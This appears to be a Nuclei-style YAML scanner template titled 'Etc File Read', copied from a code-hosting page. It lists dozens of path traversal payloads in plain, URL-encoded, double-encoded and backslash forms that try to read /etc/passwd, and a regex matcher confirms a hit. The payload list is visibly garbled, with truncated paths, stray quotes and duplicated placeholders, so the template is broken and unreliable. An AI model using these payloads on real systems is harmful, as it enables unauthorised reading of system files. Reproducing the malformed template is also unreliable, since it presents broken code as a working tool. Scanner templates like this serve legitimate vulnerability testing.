-
Notifications
You must be signed in to change notification settings - Fork 3
/
2.yaml
110 lines (100 loc) · 4.06 KB
/
2.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
id: Etc-file
info:
name: Etc File Read
author: Saimon
severity: high
description: Finds etc password files
requests:
- method: GET
path:
- |
- "{{BaseURL}}swd"
- "{{BaseURL}}passwd"
- "{{BaseURL}}tc/passwd{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}asswd"
- "{{BaseURL}}etc/passwd"
- "{{BaseURL}}.%2f/etc/passwd"
- "{{BaseURL}}.%2f..%2f/etc/passwd"
- "{{BaseURL}}.%2f..%2f..%2f/etc/passwd"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}e//etc/passwd"
- "{{BaseURL}}e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
- "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}swd"
- "{{BaseURL}}f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"
- "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}2f/etc/passwd"
- "{{BaseURL}}2f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f..%252f/etc/passwd"
- "{{BaseURL}}2f..%252f..%252f..%252f..%252f/etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}/passwd"
- "{{BaseURL}}e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"
- "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"
- "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}swd"
- "{{BaseURL}}passwd"
- "{{BaseURL}}tc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}5c/etc/passwd"
- "{{BaseURL}}5c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c..%255c/etc/passwd"
- "{{BaseURL}}5c..%255c..%255c..%255c..%255c/etc/passwd{{BaseURL}}""
- "
- "{{BaseURL}}/passwd..%5c/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}asswd"
- "{{BaseURL}}etc/passwd"
- "{{BaseURL}}.%5c/etc/passwd"
- "{{BaseURL}}.%5c..%5c/etc/passwd"
- "{{BaseURL}}.%5c..%5c..%5c/etc/passwd{{BaseURL}}"
- "{{BaseURL}}""
- "
- "{{BaseURL}}passwd"
- "{{BaseURL}}e\/etc/passwd"
- "{{BaseURL}}e\%2e%2e\/etc/passwd"
matcher-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*] :0:0"
- "\\[(font|extension|file)s\\]"
part: body